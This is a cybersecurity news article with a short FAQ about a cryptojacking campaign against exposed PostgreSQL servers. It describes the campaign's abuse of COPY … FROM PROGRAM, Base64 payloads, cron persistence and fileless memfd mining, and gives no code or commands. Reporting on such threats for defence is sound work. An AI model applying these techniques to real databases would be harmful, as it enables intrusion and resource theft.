A new cybercrime campaign is targeting exposed PostgreSQL databases to install cryptocurrency miners, leading to over 1,500 compromised systems. Researchers from cloud security firm Wiz identified the threat actor, dubbed JINX-0126, which has adopted advanced evasion techniques to avoid detection. This includes using a unique file hash for each target and executing payloads in a fileless manner. The campaign exploits weak configurations in PostgreSQL services, allowing attackers to conduct reconnaissance and deploy malicious software. Notably, the method of leveraging the COPY … FROM PROGRAM SQL command is a distinctive aspect of this attack, enabling arbitrary command execution on affected hosts. Organizations should strengthen their database security to mitigate such risks.
Exposed PostgreSQL Instances Targeted by New Cryptocurrency Mining Campaign
April 01, 2025
By Ravie Lakshmanan
Tags: Cryptojacking, Cloud Security
A new threat targeting exposed PostgreSQL database instances is making waves in cybersecurity. The campaign, discovered by cloud security firm Wiz, aims to gain unauthorized access and deploy cryptocurrency miners to exploit these databases. Known as a variant of the intrusion set identified by Aqua Security in August 2024, this attack involves a specific malware strain termed PG_MEM. Wiz attributes this malicious activity to a threat actor they call JINX-0126.
Advanced Techniques Used by Cybercriminals
According to Wiz researchers, the attackers have utilized evolving tactics to evade detection. By deploying binaries with unique hashes for each target and executing miner payloads without involving traditional files, they can bypass many cloud workload protection solutions. The research team noted that this activity has already impacted over 1,500 victims, primarily due to weak or predictable credentials surrounding publicly exposed PostgreSQL instances.
Unique Command Exploitation
One of the most troubling aspects of this campaign is the misuse of the SQL command “COPY … FROM PROGRAM.” This command enables the execution of arbitrary shell commands on the database host, allowing attackers to gain further access and control.
When successfully exploiting poorly configured PostgreSQL services, the cybercriminals can perform reconnaissance and load a Base64-encoded payload. This payload includes a shell script designed to eliminate competing cryptocurrency miners while installing a binary known as PG_CORE.
Persisting Through Obfuscation
These attackers also employ an obfuscated Golang binary named postmaster that simulates a legitimate PostgreSQL server. Its purpose is to ensure persistence on the compromised host via a cron job, create elevated privilege roles, and deploy another binary file called cpu_hu.
The cpu_hu binary is responsible for downloading the latest version of the XMRig miner from GitHub. The attackers employ a fileless technique known as memfd, which allows them to execute the miner without creating conventional files on the server.
The campaign demonstrates the sophisticated methods used by cybercriminals to compromise systems and mine cryptocurrency. The unique mining workers assigned to each victim indicate that the attackers have orchestrated a widespread operation, leveraging over 1,500 compromised machines.
Stay Informed and Secure
In the ever-evolving landscape of cyber threats, it’s critical for organizations to monitor their PostgreSQL configurations and employ robust security measures. Following cybersecurity updates can help ensure systems remain secure against potential attacks like the one from JINX-0126.
For more insights into cybersecurity and to stay updated on similar threats, consider following reliable sources in the industry.
What happened with the PostgreSQL servers?
Over 1,500 PostgreSQL servers were hacked in a recent campaign to mine cryptocurrency. Attackers used a method that does not leave traditional files on the servers, making it harder to detect.
How do hackers compromise these servers?
Hackers often find weak passwords or unpatched software. Once they get in, they can install software to mine cryptocurrencies without alerting the owner.
What is fileless cryptocurrency mining?
Fileless cryptocurrency mining is when the mining software runs in the system’s memory without leaving files on the disk. This makes it difficult to find and remove by traditional antivirus tools.
How can I protect my PostgreSQL server?
To protect your server, use strong passwords and keep your software updated. Also, regularly check server logs for unusual activity and consider using firewalls for additional security.
What should I do if my server has been compromised?
If you suspect a compromise, immediately take your server offline to prevent further damage. Then, investigate the attack, change passwords, and look for signs of unauthorized access. It may also be good to consult with security professionals.